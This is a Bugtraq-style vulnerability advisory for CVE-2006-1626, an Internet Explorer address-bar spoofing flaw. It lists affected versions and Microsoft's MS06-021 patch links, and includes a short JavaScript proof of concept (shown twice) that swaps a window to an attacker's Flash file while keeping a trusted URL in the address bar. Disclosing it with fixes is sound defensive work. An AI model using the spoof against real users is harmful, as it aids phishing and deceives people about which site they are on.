Microsoft Internet Explorer Address Bar Spoofing Vulnerability
BID:17404
Info
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
| Bugtraq ID: | 17404 |
| Class: | Race Condition Error |
| CVE: |
CVE-2006-1626 |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 03 2006 12:00AM |
| Updated: | Jul 21 2006 10:27PM |
| Credit: | Hai Nam Luke is credited with the discovery of this vulnerability. |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 for Windows NT 4.0 Microsoft Internet Explorer 5.0.1 for Windows 98 Microsoft Internet Explorer 5.0.1 for Windows 95 Microsoft Internet Explorer 5.0.1 for Windows 2000 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 7.0 beta2 Microsoft Internet Explorer 7.0 beta1 Microsoft Internet Explorer 6.0 SP2 - do not use Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 preview Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.0 for Windows NT 4 Microsoft Internet Explorer 5.0 for Windows 98 Microsoft Internet Explorer 5.0 for Windows 95 Microsoft Internet Explorer 5.0 for Windows 2000 Microsoft Internet Explorer 5.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
Internet Explorer is prone to address-bar spoofing.
An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain.
Internet Explorer is prone to address-bar spoofing.
An attacker can exploit this issue to display the URI of a trusted and known site in the address bar, while running an attacker-supplied Macromedia Flash application. This may aid in phishing-style attacks and possibly allow access to properties of the trusted domain.
Exploit / POC
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
The following proof of concept is available:
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.example.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">Perform the test</a>
The following proof of concept is available:
<script language="javascript">
function pause(ms)
{
date = new Date();
var curDate = null;
do { var curDate = new Date(); }
while(curDate-date < ms);
}
function spoof () {
win = window.open('http://www.microsoft.com/','new')
pause (2000)
win = window.open('http://www.example.com/swfs/index.swf','new')
pause (2000)
win = window.open('http://www.microsoft.com/','new')
}
</script>
<a href="javascript: spoof()">Perform the test</a>
Solution / Fix
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
Solution:
The vendor has released a security advisory addressing this issue.
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4
Solution:
The vendor has released a security advisory addressing this issue.
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Update for Internet Explorer 6 SP1 (KB916281)
Microsoft Windows 2000 Service Pack 4 or on Microsoft Windows XP Service Pack 1
http://www.microsoft.com/downloads/details.aspx?familyid=0EB17A41-FB43 -413B-A5CC-41E1F3DEDE4F&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 (KB916281)
For Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?familyid=CCE7C875-C9A4 -4C3D-A37B-946EE5E781E7&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 64-bit Itanium Edition (KB916281) -
Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
http://www.microsoft.com/downloads/details.aspx?familyid=C8E4CFB6-1350 -4AAE-B681-EE2ECAB41118&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 x64 Edition (KB916281)
Microsoft Windows Server 2003 x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=1C7D5C6D-DDCF -485D-A1E3-60E55334FD74&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows XP Service Pack 2 (KB916281)
For Microsoft Windows XP Service Pack 2
http://www.microsoft.com/downloads/details.aspx?familyid=85CABE87-C4A0 -4F80-BD1C-210E23FD8D81&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows XP x64 Edition (KB916281)
Microsoft Windows XP Professional x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=F91791AC-8185 -4346-AA66-89F74D4B5EA7&displaylang=en
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 (KB916281)
For Microsoft Windows Server 2003 and Microsoft Windows Server 2003 Service Pack 1
http://www.microsoft.com/downloads/details.aspx?familyid=CCE7C875-C9A4 -4C3D-A37B-946EE5E781E7&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 64-bit Itanium Edition (KB916281) -
Microsoft Windows Server 2003 for Itanium-based Systems and Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
http://www.microsoft.com/downloads/details.aspx?familyid=C8E4CFB6-1350 -4AAE-B681-EE2ECAB41118&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows Server 2003 x64 Edition (KB916281)
Microsoft Windows Server 2003 x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=1C7D5C6D-DDCF -485D-A1E3-60E55334FD74&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows XP Service Pack 2 (KB916281)
For Microsoft Windows XP Service Pack 2
http://www.microsoft.com/downloads/details.aspx?familyid=85CABE87-C4A0 -4F80-BD1C-210E23FD8D81&displaylang=en -
Microsoft Cumulative Update for Internet Explorer for Windows XP x64 Edition (KB916281)
Microsoft Windows XP Professional x64 Edition
http://www.microsoft.com/downloads/details.aspx?familyid=F91791AC-8185 -4346-AA66-89F74D4B5EA7&displaylang=en
Microsoft Internet Explorer 5.0.1 SP4
-
Microsoft Cumulative Update for Internet Explorer 5.01 Service Pack 4 (KB916281)
Microsoft Windows 2000 Service Pack 4
http://www.microsoft.com/downloads/details.aspx?familyid=91A997DE-BAE4 -4AC7-912D-79EF8ABAEF4F&displaylang=en
References
Microsoft Internet Explorer Address Bar Spoofing Vulnerability
References:
References:
- Internet Explorer Address Bar Spoofing Vulnerability Test (Secunia)
- Mozilla Firefox Home Page (Mozilla)
- MS06-021 - Cumulative Security Update for Internet Explorer (916281) (Microsoft)
- about bid 17404 ([email protected])
- Another Internet Explorer Address Bar Spoofing Vulnerability ([email protected])
- Re: Re: Another Internet Explorer Address Bar Spoofing Vulnerability ([email protected])